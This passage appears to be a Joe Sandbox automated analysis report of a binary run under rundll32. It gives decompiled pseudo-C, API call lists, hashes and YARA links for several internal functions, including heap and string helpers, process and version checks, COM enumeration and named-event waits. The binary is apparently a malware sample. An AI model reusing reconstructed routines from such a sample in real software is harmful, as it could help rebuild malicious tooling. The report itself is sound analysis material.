Instruction ID: d3cf42bf05ab310cb050fa27eb5166129e0f6c66dec725077fbb3a381d31112c
Opcode Fuzzy Hash: 6edaf567133eaadecd6fbb17244a96cdc2efd33fe096fbae93810528c80085bc
Instruction Fuzzy Hash: B7F01C74242641EFE720DFA9DD48FDA37A4AF14744F048404F465CB261C734ED82CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 00A16BB2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00A16BB2() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0xa1d2d4; // 0x5489630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0xa1d2d4; // 0x5489630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0xa1d2d4; // 0x5489630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0xa1e882) {
					HeapFree( *0xa1d1f0, 0, _t10);
					_t7 =  *0xa1d2d4; // 0x5489630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x00a16bb2
0x00a16bbb
0x00a16bcb
0x00a16bcb
0x00a16bd0
0x00a16bd5
0x00000000
0x00000000
0x00a16bc5
0x00a16bc5
0x00a16bd7
0x00a16bdc
0x00a16be0
0x00a16bf3
0x00a16bf9
0x00a16bf9
0x00a16c02
0x00a16c04
0x00a16c08
0x00a16c0e

APIs

RtlEnterCriticalSection.NTDLL(054895F0), ref: 00A16BBB
Sleep.KERNEL32(0000000A,?,?,00A17260,?,?,?,?,?,00A1258B,?,00000001), ref: 00A16BC5
HeapFree.KERNEL32(00000000,?,?,?,00A17260,?,?,?,?,?,00A1258B,?,00000001), ref: 00A16BF3
RtlLeaveCriticalSection.NTDLL(054895F0), ref: 00A16C08

Strings

Uxt, xrefs: 00A16BF3

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID: Uxt
API String ID: 58946197-1536154274
Opcode ID: b7676185ecdb0b78d9a22acdfed0e3c944236e75bb018686ad92412b6deab8fc
Instruction ID: f016b498a44b22c374738fffc0bdcf74f60d49416fa9d8989044aade334e100c
Opcode Fuzzy Hash: b7676185ecdb0b78d9a22acdfed0e3c944236e75bb018686ad92412b6deab8fc
Instruction Fuzzy Hash: A2F0D474289202EFE718CFA5DD89FE937A5AB08754B048418E806CB270C734EC42DB14

Uniqueness

Uniqueness Score: -1.00%

Function 00A14FE9, Relevance: 7.6, APIs: 5, Instructions: 75
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00A14FE9(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t49;
				void* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 = _t49 + _t5;
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 =  *0xa1d0fc(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t44 = RtlAllocateHeap( *0xa1d1f0, 0, _a16 + __eax);
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}

0x00a14ff1
0x00a14ff6
0x00a14ff8
0x00a14fff
0x00a15011
0x00a15011
0x00a15015
0x00a15017
0x00a1501a
0x00a1501d
0x00a15026
0x00a15030
0x00a15034
0x00a15039
0x00a1504f
0x00a15053
0x00a150a4
0x00a15055
0x00a15055
0x00a1505d
0x00a1506c
0x00a15071
0x00a15081
0x00a15087
0x00a15092
0x00a1509c
0x00a150a0
0x00a150a0
0x00a15053
0x00a150ab
0x00a150b2

APIs

lstrlen.KERNEL32(747DF710,?,00000000,?,747DF710), ref: 00A1501D
RtlAllocateHeap.NTDLL(00000000,?), ref: 00A15049
memcpy.NTDLL(00000000,0000000B,0000000B), ref: 00A1505D
memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00A1506C
memcpy.NTDLL(00000000,0000000B,?,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00A15087

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 98de00de5607ad2963fc82bce79dac30f06b135f9d7fb0c03a20866f39ab4801
Instruction ID: 78ab3d455900736d4223712feecad7e1a9285971e1f458555178acdf1517a120
Opcode Fuzzy Hash: 98de00de5607ad2963fc82bce79dac30f06b135f9d7fb0c03a20866f39ab4801
Instruction Fuzzy Hash: D7217C36900519EFCB018FA8CC88ADEBFB9EF89300F098155FC04AB215D631DA55CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6FC65071, Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6FC6507D

Part of subcall function 6FC64FDF: __FF_MSGBANNER.LIBCMT ref: 6FC64FF6
Part of subcall function 6FC64FDF: __NMSG_WRITE.LIBCMT ref: 6FC64FFD
Part of subcall function 6FC64FDF: RtlAllocateHeap.NTDLL(6FC914F0,00000000,00000001), ref: 6FC65022

_free.LIBCMT ref: 6FC65090

Memory Dump Source

Source File: 00000002.00000002.647449462.000000006FC50000.00000020.00020000.sdmp, Offset: 6FC50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6fc50000_rundll32.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 513bb8c78d51bb3a78d99d7569cb903eae664a6ddebfe916ffbf085c9e821835
Instruction ID: 2fee3c4d74a2b38b044d948911fd0b2ad29b2ceb6faa5dd860590b7008515528
Opcode Fuzzy Hash: 513bb8c78d51bb3a78d99d7569cb903eae664a6ddebfe916ffbf085c9e821835
Instruction Fuzzy Hash: 9411A03254C713EBCB211B7D98C4A8937A8AF07378F308A26E9589A2D5FB34D45487E0

Uniqueness

Uniqueness Score: -1.00%

Function 00A14CF4, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A14CF4(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xa1d224 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0xa1d214 = _t4;
				_t6 = GetCurrentProcessId();
				 *0xa1d210 = _t6;
				 *0xa1d21c = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0xa1d20c = _t7;
				if(_t7 == 0) {
					 *0xa1d20c =  *0xa1d20c | 0xffffffff;
				}
				return 0;
			}

0x00a14cfc
0x00a14d04
0x00a14d09
0x00000000
0x00a14d56
0x00a14d0b
0x00a14d13
0x00a14d53
0x00000000
0x00a14d53
0x00a14d15
0x00a14d1a
0x00a14d2c
0x00a14d31
0x00a14d37
0x00a14d3f
0x00a14d44
0x00a14d46
0x00a14d46
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00A12501,?,?,00000001), ref: 00A14CFC
GetVersion.KERNEL32(?,00000001), ref: 00A14D0B
GetCurrentProcessId.KERNEL32(?,00000001), ref: 00A14D1A
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00A14D37
GetLastError.KERNEL32(?,00000001), ref: 00A14D56

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 0b8b12b2f3c4719b14b206a37c322c6092484f0c96e8fe7b7712ce893d45725d
Instruction ID: d8fd6927f47b90a48b9a4767981812544a933d10c4e96330393066820852e95b
Opcode Fuzzy Hash: 0b8b12b2f3c4719b14b206a37c322c6092484f0c96e8fe7b7712ce893d45725d
Instruction Fuzzy Hash: BFF0A4B0681301DBDB10DFA9BD09BD53BB4A708B61F10C619E22ACA1E0DA7485429F29

Uniqueness

Uniqueness Score: -1.00%

Function 00A1736F, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00A1736F(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xa1d230; // 0x4a6a5a8
					_t5 = _t102 + 0xa1e038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xa1c2c8);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xa1d230; // 0x4a6a5a8
												_t28 = _t108 + 0xa1e0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xa1d230; // 0x4a6a5a8
														_t33 = _t78 + 0xa1e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x00a17374
0x00a1737d
0x00a1737e
0x00a17382
0x00a17388
0x00a1738e
0x00a17397
0x00a1739d
0x00a173a7
0x00a173a9
0x00a173af
0x00a173b4
0x00a173bf
0x00a173c7
0x00a173ca
0x00a174ed
0x00a173d0
0x00a173d0
0x00a173dd
0x00a173e3
0x00a173e9
0x00a173ed
0x00a173f3
0x00a17400
0x00a17404
0x00a1740a
0x00a1740d
0x00a17413
0x00a17419
0x00a1741f
0x00a17422
0x00a17425
0x00a1742b
0x00a17434
0x00a1743a
0x00a1743b
0x00a1743e
0x00a1743f
0x00a17440
0x00a17448
0x00a17449
0x00a1744a
0x00a1744c
0x00a17450
0x00a17454
0x00000000
0x00000000
0x00a1745a
0x00a17463
0x00a17469
0x00a17473
0x00a17477
0x00a17479
0x00a17486
0x00a1748a
0x00a17492
0x00a17497
0x00a174a9
0x00a174ab
0x00a174b1
0x00a174b1
0x00a174ba
0x00a174ba
0x00a174bc
0x00a174c2
0x00a174c2
0x00a174c5
0x00a174cb
0x00a174ce
0x00a174d7
0x00000000
0x00000000
0x00000000
0x00a174d7
0x00a1742b
0x00a17425
0x00a1740d
0x00a174dd
0x00a174dd
0x00a174e3
0x00a174e3
0x00a174e9
0x00a174e9
0x00a174f2
0x00a174f8
0x00a174f8
0x00a173b4
0x00a17501

APIs

SysAllocString.OLEAUT32(00A1C2C8), ref: 00A173BF
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00A174A1
SysFreeString.OLEAUT32(00000000), ref: 00A174BA
SysFreeString.OLEAUT32(?), ref: 00A174E9

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 9a73798458bf5d98bde5a9824585bb505dd95a380bfaf65c428865e4babb7a82
Instruction ID: 31b573d83b549e3b0dcbc89f2a845bd52160b51729fd546f1893adf60f2ea5cf
Opcode Fuzzy Hash: 9a73798458bf5d98bde5a9824585bb505dd95a380bfaf65c428865e4babb7a82
Instruction Fuzzy Hash: E3512B75D00519EFCB01DFA8C9888EEBBB9FF89704B148598E915EB210D7719D42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A1674C, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00A1674C(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00A140A2(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00A1A2E7(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00A17010(_t101,  &_v236, _a8, _t96 - _t81);
					E00A17010(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E00A1A2E7(_t101,  &E00A1D168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00A1A2E7(_a16, _a4);
						E00A16F99(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00A1AEF0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00A1AEEA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E00A13EEB(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E00A14A9C(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00A1949F(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E00A1D168) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00a1674f
0x00a1675b
0x00a16761
0x00a16766
0x00a1676a
0x00a168c7
0x00a168cb
0x00a168cb
0x00a16770
0x00a16774
0x00a1677a
0x00a1677b
0x00a16786
0x00a1678c
0x00a16791
0x00a16794
0x00a167ae
0x00a167ba
0x00a167c3
0x00a167cd
0x00a167d2
0x00a167d4
0x00a167d7
0x00a16885
0x00a1688b
0x00a1689c
0x00a168af
0x00a168bf
0x00000000
0x00a168c4
0x00a167e0
0x00a167e7
0x00a167eb
0x00a167f1
0x00a167f3
0x00a167f5
0x00a167f7
0x00a167f9
0x00a16803
0x00a16808
0x00a1680a
0x00a1680c
0x00a1680d
0x00a1680e
0x00a1680f
0x00a16816
0x00a1681d
0x00a16820
0x00a16820
0x00a167ed
0x00a167ed
0x00a167ed
0x00a16828
0x00a16830
0x00a16839
0x00a1683e
0x00a1683e
0x00a16843
0x00000000
0x00000000
0x00a16845
0x00a16848
0x00a16852
0x00000000
0x00000000
0x00a16854
0x00a16854
0x00a1685e
0x00a1683e
0x00a16843
0x00000000
0x00000000
0x00000000
0x00a16843
0x00a16868
0x00a1686b
0x00a1686e
0x00a16875
0x00a16875
0x00a16882
0x00000000
0x00a16882
0x00a1677d
0x00a16781
0x00a16782
0x00a16784
0x00000000
0x00000000
0x00000000
0x00a16784
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00A167F9
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00A1680F
memset.NTDLL ref: 00A168AF
memset.NTDLL ref: 00A168BF

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 1e6eba8e5cdf3820c1b6c338e56abd99ed1ebfe99e725acac99dd75b075d86c9
Instruction ID: 570579061f0d3d0c172a1c63fbedfab0d95c895e428f4e877205799db482d97e
Opcode Fuzzy Hash: 1e6eba8e5cdf3820c1b6c338e56abd99ed1ebfe99e725acac99dd75b075d86c9
Instruction Fuzzy Hash: 5141E572A00219ABDB10DFA8CD41BEE7779EF58310F108529F919EB180DB709D94CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A16A74, Relevance: 6.1, APIs: 4, Instructions: 108
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E00A16A74(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_push( &_v24);
				_push(1);
				_push(0);
				if( *0xa1d138() != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E00A1550F(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0xa1d224, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E00A1A07B(_v20);
							if(_v8 == 0) {
								_v8 = E00A19BAA(_v24, _t64);
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53);
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}

0x00a16a7c
0x00a16a7f
0x00a16a88
0x00a16a8b
0x00a16a8e
0x00a16a96
0x00a16b94
0x00a16b9f
0x00a16ba2
0x00a16baa
0x00a16bb1
0x00a16bb1
0x00a16ba4
0x00a16ba7
0x00a16ba7
0x00000000
0x00a16ba7
0x00a16a9f
0x00000000
0x00000000
0x00a16aa8
0x00a16aa9
0x00a16aab
0x00a16ab4
0x00a16b8b
0x00000000
0x00a16b8b
0x00a16ac0
0x00a16ac7
0x00a16aca
0x00a16b79
0x00a16b80
0x00a16b80
0x00a16b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00a16ad0
0x00a16ad0
0x00a16ad0
0x00a16ad0
0x00a16ad5
0x00a16ad7
0x00a16ad7
0x00a16ae4
0x00a16aec
0x00000000
0x00000000
0x00a16aee
0x00a16afb
0x00a16b01
0x00a16b01
0x00a16b04
0x00000000
0x00000000
0x00a16b11
0x00a16b25
0x00a16b5b
0x00a16b5e
0x00a16b61
0x00a16b69
0x00a16b74
0x00a16b74
0x00000000
0x00a16b69
0x00a16b27
0x00a16b2e
0x00a16b36
0x00000000
0x00000000
0x00a16b38
0x00a16b43
0x00a16b46
0x00000000
0x00a16b4d
0x00a16b4d
0x00000000
0x00a16b4d
0x00a16b46
0x00a16b0e
0x00000000
0x00a16b50
0x00a16b50
0x00000000

APIs

GetLastError.KERNEL32 ref: 00A16B94

Part of subcall function 00A1550F: RtlAllocateHeap.NTDLL(00000000,00000000,00A1863D), ref: 00A1551B

GetLastError.KERNEL32 ref: 00A16B08
WaitForSingleObject.KERNEL32(00000000), ref: 00A16B18
GetLastError.KERNEL32 ref: 00A16B38

Memory Dump Source

Source File: 00000002.00000002.643565723.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000002.00000002.643546064.0000000000A10000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643591883.0000000000A1C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.643602806.0000000000A1D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.643619209.0000000000A1F000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a10000_rundll32.jbxd

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: 4394a67784b8606ffc3b731b13cae484c6d8ff14702e4714106dbd4703432919
Instruction ID: 3551c82a1180255c3b95dc2eeb90ce9bfd03b3f88c4875cf9ec4581c8016b361
Opcode Fuzzy Hash: 4394a67784b8606ffc3b731b13cae484c6d8ff14702e4714106dbd4703432919
Instruction Fuzzy Hash: 2241F6B0948209EFDF10DFE4D9849EEBBB9FB04345B2484A9E502E3150D7319E81DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A150B5, Relevance: 6.1, APIs: 4, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00A150B5(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0xa1d228; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0xa1d230; // 0x4a6a5a8
				_t3 = _t8 + 0xa1e84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E00A1A090(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0xa1d234, 1, 0, _t30);
					E00A1A07B(_t30);
				}
				_t12 =  *0xa1d214; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 != 0 && E00A1229C() == 0) {
						_t28 =  *0xa1d100( *_t32, 0x20);
						if(_t28 != 0) {
							 *_t28 =  *_t28 & 0x00000000;
							_t28 =  &(_t28[1]);
						}
						_t31 = E00A18134(0, _t28,  *_t32, 0);
						if(_t31 == 0) {
							if(_t25 == 0) {
								goto L21;
							}
							_t31 = WaitForSingleObject(_t25, 0x4e20);
							if(_t31 == 0) {
								goto L19;
							}
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t31 = E00A1A3FC(_t32, _t26);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x00a150b6
0x00a150bd
0x00a150c7
0x00a150cb
0x00a150d1
0x00a150de
0x00a150e5
0x00a150e9
0x00a150fb
0x00a150fd
0x00a150fd
0x00a15102
0x00a15109
0x00a15114
0x00a1512a
0x00a1512e
0x00a15130
0x00a15135
0x00a15135
0x00a15142
0x00a15146
0x00a1514a
0x00000000
0x00000000
0x00a15158
0x00a1515c
